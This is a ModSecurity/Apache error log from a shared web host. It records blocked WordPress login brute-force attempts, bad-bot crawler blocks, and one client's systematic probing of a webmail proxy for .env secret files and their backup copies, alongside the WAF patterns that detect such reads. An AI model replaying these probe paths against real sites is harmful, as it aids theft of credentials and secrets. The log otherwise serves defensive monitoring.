[Tue May 26 19:38:31.428216 2026] [security2:error] [pid 70836:tid 70849] [remote 92.205.188.156:43598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpX-_FvbQ_BhqVMRV3OwAArww"]
[Tue May 26 19:38:32.641284 2026] [security2:error] [pid 70836:tid 71059] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpYO_FvbQ_BhqVMRV3cwAAAOI"]
[Tue May 26 19:38:32.641329 2026] [security2:error] [pid 70836:tid 71059] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpYO_FvbQ_BhqVMRV3cwAAAOI"]
[Tue May 26 19:38:32.641582 2026] [security2:error] [pid 70836:tid 71016] [client 65.109.156.37:52761] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/homepages/portfolio-photo/"] [unique_id "ahWpYO_FvbQ_BhqVMRV3cAAAALc"]
[Tue May 26 19:38:32.691953 2026] [security2:error] [pid 70836:tid 71027] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpYO_FvbQ_BhqVMRV3XwAAAMI"]
[Tue May 26 19:38:32.718650 2026] [autoindex:error] [pid 70836:tid 71036] [client 43.159.138.217:57176] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:38:34.611776 2026] [security2:error] [pid 70836:tid 71024] [client 31.57.184.107:53191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "onlineitmaster.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWpYu_FvbQ_BhqVMRV3pQAAAL8"]
[Tue May 26 19:38:34.900409 2026] [security2:error] [pid 70836:tid 70857] [remote 92.205.188.156:43598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpYu_FvbQ_BhqVMRV3rwAAxRQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:38:34.949543 2026] [security2:error] [pid 70836:tid 71035] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpYu_FvbQ_BhqVMRV3qQAAAMo"]
[Tue May 26 19:38:35.554737 2026] [security2:error] [pid 70836:tid 70871] [remote 88.198.165.116:42940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpY-_FvbQ_BhqVMRV3wAAAqSI"]
[Tue May 26 19:38:36.177945 2026] [security2:error] [pid 70836:tid 70873] [remote 92.205.109.21:50400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpY-_FvbQ_BhqVMRV3zgAAliQ"]
[Tue May 26 19:38:36.342461 2026] [security2:error] [pid 70836:tid 71092] [client 114.119.141.79:33893] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.traderscafe.in"] [uri "/tradingview/"] [unique_id "ahWpZO_FvbQ_BhqVMRV34QAAAQM"], referer: https://www.traderscafe.in/tradingview/?on_sale=onsale&shop_view=list_view&stock_status=instock
[Tue May 26 19:38:36.672051 2026] [security2:error] [pid 70836:tid 71033] [client 114.119.136.15:24915] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "consultrgb.com"] [uri "/"] [unique_id "ahWpZO_FvbQ_BhqVMRV36wAAAMg"], referer: https://consultrgb.com/
[Tue May 26 19:38:36.674761 2026] [security2:error] [pid 70836:tid 70876] [remote 176.31.139.24:63994] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.xllent.in"] [uri "/robots.txt"] [unique_id "ahWpZO_FvbQ_BhqVMRV37AAA6Cc"]
[Tue May 26 19:38:36.674984 2026] [security2:error] [pid 70836:tid 71065] [client 176.31.139.24:63994] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.xllent.in"] [uri "/robots.txt"] [unique_id "ahWpZO_FvbQ_BhqVMRV37AAA6Cc"]
[Tue May 26 19:38:36.934904 2026] [security2:error] [pid 70836:tid 71077] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpZO_FvbQ_BhqVMRV35AAAAPQ"]
[Tue May 26 19:38:38.356993 2026] [security2:error] [pid 70836:tid 70986] [client 47.128.34.40:30130] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mahehealthcare.com"] [uri "/robots.txt"] [unique_id "ahWpZu_FvbQ_BhqVMRV4HQAAAJk"]
[Tue May 26 19:38:38.748486 2026] [security2:error] [pid 70836:tid 70892] [remote 15.235.96.37:23876] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.xllent.in"] [uri "/"] [unique_id "ahWpZu_FvbQ_BhqVMRV4KAAA_jc"]
[Tue May 26 19:38:38.748709 2026] [security2:error] [pid 70836:tid 71087] [client 15.235.96.37:23876] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.xllent.in"] [uri "/"] [unique_id "ahWpZu_FvbQ_BhqVMRV4KAAA_jc"]
[Tue May 26 19:38:38.981438 2026] [security2:error] [pid 70836:tid 71061] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpZu_FvbQ_BhqVMRV4JAAAAOQ"]
[Tue May 26 19:38:40.213361 2026] [security2:error] [pid 70836:tid 71078] [client 34.74.242.206:1680] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "pronumbers.com.au"] [uri "/robots.txt"] [unique_id "ahWpaO_FvbQ_BhqVMRV4ZwAAAPU"]
[Tue May 26 19:38:40.213481 2026] [security2:error] [pid 70836:tid 71078] [client 34.74.242.206:1680] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "pronumbers.com.au"] [uri "/robots.txt"] [unique_id "ahWpaO_FvbQ_BhqVMRV4ZwAAAPU"]
[Tue May 26 19:38:40.326666 2026] [security2:error] [pid 70836:tid 71020] [client 207.241.173.18:19678] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahWpaO_FvbQ_BhqVMRV4cAAAALs"]
[Tue May 26 19:38:40.328222 2026] [security2:error] [pid 70836:tid 71068] [client 34.74.242.206:1669] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "pronumbers.com.au"] [uri "/"] [unique_id "ahWpaO_FvbQ_BhqVMRV4cQAAAOs"]
[Tue May 26 19:38:40.328290 2026] [security2:error] [pid 70836:tid 71068] [client 34.74.242.206:1669] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "pronumbers.com.au"] [uri "/"] [unique_id "ahWpaO_FvbQ_BhqVMRV4cQAAAOs"]
[Tue May 26 19:38:40.490120 2026] [security2:error] [pid 70836:tid 70964] [remote 201.170.230.165:37188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.230.170.201.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpaO_FvbQ_BhqVMRV4bAAA2n8"]
[Tue May 26 19:38:40.513831 2026] [security2:error] [pid 70836:tid 70998] [client 207.241.173.18:19740] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahWpaO_FvbQ_BhqVMRV4eQAAAKU"]
[Tue May 26 19:38:40.617860 2026] [security2:error] [pid 70836:tid 71086] [client 207.241.173.18:19718] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/app/.env"] [unique_id "ahWpaO_FvbQ_BhqVMRV4gQAAAP0"]
[Tue May 26 19:38:40.619068 2026] [security2:error] [pid 70836:tid 71086] [client 207.241.173.18:19690] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/api/.env"] [unique_id "ahWpaO_FvbQ_BhqVMRV4hAAAAP0"]
[Tue May 26 19:38:41.101224 2026] [security2:error] [pid 70836:tid 70906] [remote 201.170.230.165:37188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.230.170.201.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpae_FvbQ_BhqVMRV4pAAAwkU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:38:43.623670 2026] [security2:error] [pid 70836:tid 70990] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpa-_FvbQ_BhqVMRV44QAAAJ0"]
[Tue May 26 19:38:44.342048 2026] [security2:error] [pid 70836:tid 71032] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpa-_FvbQ_BhqVMRV49wAAAMc"]
[Tue May 26 19:38:44.414113 2026] [security2:error] [pid 70836:tid 71075] [client 207.241.173.18:19740] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.production.copy"] [unique_id "ahWpbO_FvbQ_BhqVMRV5CgAAAPI"]
[Tue May 26 19:38:45.816392 2026] [security2:error] [pid 70836:tid 71011] [client 207.241.173.18:21588] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.production.orig"] [unique_id "ahWpbe_FvbQ_BhqVMRV5QQAAALI"]
[Tue May 26 19:38:45.818211 2026] [security2:error] [pid 70836:tid 71007] [client 207.241.173.18:21584] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.production.swp"] [unique_id "ahWpbe_FvbQ_BhqVMRV5QwAAAK4"]
[Tue May 26 19:38:45.819054 2026] [security2:error] [pid 70836:tid 71059] [client 207.241.173.18:21572] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.production~"] [unique_id "ahWpbe_FvbQ_BhqVMRV5RAAAAOI"]
[Tue May 26 19:38:45.820218 2026] [security2:error] [pid 70836:tid 71052] [client 207.241.173.18:21552] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.production.backup"] [unique_id "ahWpbe_FvbQ_BhqVMRV5RQAAANs"]
[Tue May 26 19:38:46.012553 2026] [security2:error] [pid 70836:tid 71002] [client 207.241.173.18:21550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.production.old"] [unique_id "ahWpbu_FvbQ_BhqVMRV5SwAAAKk"]
[Tue May 26 19:38:46.565513 2026] [security2:error] [pid 70836:tid 71013] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpbu_FvbQ_BhqVMRV5TwAAALQ"]
[Tue May 26 19:38:46.721200 2026] [security2:error] [pid 70836:tid 70989] [client 207.241.173.18:21488] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.local.bak"] [unique_id "ahWpbu_FvbQ_BhqVMRV5awAAAJw"]
[Tue May 26 19:38:46.721259 2026] [security2:error] [pid 70836:tid 70971] [client 207.241.173.18:21520] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.local~"] [unique_id "ahWpbu_FvbQ_BhqVMRV5agAAAIo"]
[Tue May 26 19:38:46.721280 2026] [security2:error] [pid 70836:tid 71039] [client 207.241.173.18:21536] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.local.copy"] [unique_id "ahWpbu_FvbQ_BhqVMRV5ZgAAAM4"]
[Tue May 26 19:38:46.721418 2026] [security2:error] [pid 70836:tid 71071] [client 207.241.173.18:21528] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.local.orig"] [unique_id "ahWpbu_FvbQ_BhqVMRV5ZwAAAO4"]
[Tue May 26 19:38:46.721434 2026] [security2:error] [pid 70836:tid 71093] [client 207.241.173.18:21498] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.local.old"] [unique_id "ahWpbu_FvbQ_BhqVMRV5bAAAAQQ"]
[Tue May 26 19:38:46.721493 2026] [security2:error] [pid 70836:tid 70972] [client 207.241.173.18:21526] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.local.swp"] [unique_id "ahWpbu_FvbQ_BhqVMRV5aAAAAIs"]
[Tue May 26 19:38:46.722540 2026] [security2:error] [pid 70836:tid 70999] [client 207.241.173.18:21500] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.local.backup"] [unique_id "ahWpbu_FvbQ_BhqVMRV5cQAAAKY"]
[Tue May 26 19:38:46.722783 2026] [security2:error] [pid 70836:tid 70989] [client 207.241.173.18:21412] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.bak"] [unique_id "ahWpbu_FvbQ_BhqVMRV5cwAAAJw"]
[Tue May 26 19:38:46.722900 2026] [security2:error] [pid 70836:tid 71027] [client 207.241.173.18:21422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.old"] [unique_id "ahWpbu_FvbQ_BhqVMRV5bgAAAMI"]
[Tue May 26 19:38:46.723146 2026] [security2:error] [pid 70836:tid 71073] [client 207.241.173.18:21546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.production.bak"] [unique_id "ahWpbu_FvbQ_BhqVMRV5ZQAAAPA"]
[Tue May 26 19:38:46.723311 2026] [security2:error] [pid 70836:tid 71040] [client 207.241.173.18:21460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.swp"] [unique_id "ahWpbu_FvbQ_BhqVMRV5cAAAAM8"]
